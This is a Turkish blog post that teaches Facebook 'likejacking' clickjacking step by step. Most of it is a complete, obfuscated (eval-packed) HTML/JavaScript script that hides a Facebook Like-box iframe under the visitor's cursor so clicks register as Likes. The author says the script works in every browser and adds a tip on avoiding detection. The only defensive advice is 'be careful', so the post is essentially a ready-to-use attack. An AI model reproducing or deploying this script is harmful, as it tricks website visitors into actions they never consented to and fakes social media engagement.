Bir çoğumuz şikayetçiyizdir, Facebook da bir fan sayfasını yada bir page´i beğenmesekte beğenmiş gibi görünürüz. Aslında ister istemez beğenmişsinizdir o sayfayı. Bunun arkasında işte ClickJacking denilen yöntem yer almaktadır.
Buna önlem nasıl alınır bunu anlatıcam ama önce bu iş nasıl işler, onu öğrenelim.
Az buçuk Javascript ve HTML bilginiz varsa, siz bile click jacking yapabilirsiniz, çünkü piyasada çatır çatır yazılmış bu tip scriptler yer almaktadır.
Ben aşağıda ki örnekte hybrid bir kod yazdım. 3-4 farklı script gördüm ve en büyük sıkıntıları cross-browser uyumluluk sorunuydu. Bir şeyi anlatırken sorunsuz bir şekilde görülmesini severim. Bu yüzden size hem bütün tarayıcılarda çalışan bir script göstericem hem de fazla detaya girmeden anlatmaya çalışıcam. Sonuçta "sizde clickjacking yapın" diye anlatmıyorum bunları. Aşağıda örnek kodlar, demolar ve video mevcut.
Nasıl Yapıyorlar?
Adım 1
Öncelikle facebook sayfanız için bir beğen butonu oluşturuyorsunuz.
Burada dikkat etmeniz gereken şey, Adım 2 de belirteceğim ince ayarlar. Ve mutlaka LikeBox oluşturmanız gerekiyor. Çünkü öneri ve benzeri şeyler istediğimizden büyük bir kutu oluşturacaktır.
Adım 2
Gerekli ayarları yaptıktan sonra size verilen buton kodundan iframe için src yi ayıklıyorsunuz. Src içinde ki adresi tarayıcınıza yapıştırdığınız da ekranda ufacık bir beğen butonu gelmiş olacak.
Adım 3
Aldığınız kodu aşağıda ki script içinde belirtilen alana yapıştırıyorsunuz ve tadaaa işte size clickjacking.
Örnek Kod HTML & JavaScript
-------------
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9" />
<title>Facebook Clickjacking</title>
</head>
<body>
Merhaba Dünya
</body>
<!-- Script kodu body dışına ve sonuna eklenecektir. -->
<script>
var Visibility = 0 /* 1= visible 0= invisible */
var disappearance = 10000 /* invisible time 10000 = 10 second */
var FakerLikerSrc = "http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fbasinpr&width=292&colorscheme=light&show_faces=true&stream=true&header=true&height=427";
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?´´:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!´´.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return´\w+´};c=1};while(c--)if(k[c])p=p.replace(new RegExp(´\b´+e(c)+´\b´,´g´),k[c]);return p}(´d T=1C.1u;d n="";d m="";6(T=="1t 1s 1q"){6(U==1){n=´´}h{n=´1p:10(f=1); -1f-f:0.0; -1e-f: 0.0; f:0.0;´};3.1d("<V 2=\"v:E !K;w:x; y:1b; q:19; A:B; "+n+"\" 18=\"r\"><t F=\""+G+"\" H=\"I\" 14=\"0\" 13=\"0\" 12=\"0\" 2=\"v:E !K;M:N; w:x; y:11; q:1j;\" Q=\"l\"></t></V>");d c=3.X(´r´);9 s(e){6(3.W)e=p;c.2.Y=e.Z-4;c.2.P=e.O-5;L g}9 J(){3.X(´r´).2.15=´N´}3.16.17=s;9 C(){z("J()",1a)}k.1c=C}h{(9(){d a=0,7=0,o=3.W?l:g;6(!o)3.1g(1h.1i);6(U==1){m=1}h{m=0};d b=3.1k(´t´);b.F=G;b.H=´I´;b.1l=0;b.Q=´l´;b.2.M=0;b.2.w=´x´;b.2.v=´1m´;b.2.y=´1n´;b.2.q=´1o´;b.2.A=´B´;b.2.f=m;3.R(´i´)[0].1r(b);k.D(´u´,j,g);z(9(){k.D(´u´,j,g);3.R(´i´)[0].1v(b);k.1w(´u´,j,g)},1x);9 j(e){6(o){a=p.Z+3.i.1y;7=p.O+3.i.1z}h{a=e.1A;7=e.1B}6(a<0)a=0;6(7<0)7=0;b.2.P=(7-8)+´S´;b.2.Y=(a-1D)+´S´;L l}})()}´,62,102,´||style|document|||if|tempY||function||||var||opacity|false|else|body|mouseMove|window|true|movis|ievis|IE|event|height|ifgh||iframe|mousemove|cursor|overflow|hidden|width|setTimeout|position|absolute|init|addEventListener|default|src|FakerLikerSrc|scrolling|no|finde|important|return|border|none|clientY|top|allowTransparency|getElementsByTagName|px|browser|Visibility|div|all|getElementById|left|clientX|alpha|65px|marginheight|marginwidth|frameborder|display|documentElement|onmousemove|id|12px|disappearance|5px|onload|write|khtml|moz|captureEvents|Event|MOUSEMOVE|21px|createElement|frameBorder|pointer|53px|23px|filter|Explorer|appendChild|Internet|Microsoft|appName|removeChild|removeEventListener|10000|scrollLeft|scrollTop|pageX|pageY|navigator|25´.split(´|´),0,{}))
</script>
<!-- Script kodu body dışına ve sonuna eklenecektir. -->
</html>
-------------
Açıklamalara gelince, Visibility değerini 1 yaparak esasında sistemin nasıl çalıştığını anlayabilirsiniz. disappearance değeri ise ne kadar süre sonra otomatik olarak yok olacağını belirler. (10000 = 10 sn) Sürekli imleç ucunda olması bariz belli eder kendini ve yakalanırsınız :) FakerLikerSrc ise Adım 1 de bahsetmiş olduğum SRC adresinin eklenceği alandır.
Demo
Video Demo
Umarım tüm detayları ile ClickJackin nasıl yapılıyor görmüşsünüzdür. Son olarak eklemek istediğim şey, nasıl korunuz diyorsanız eğer cevap oldukça basit.
Dikkat edin..
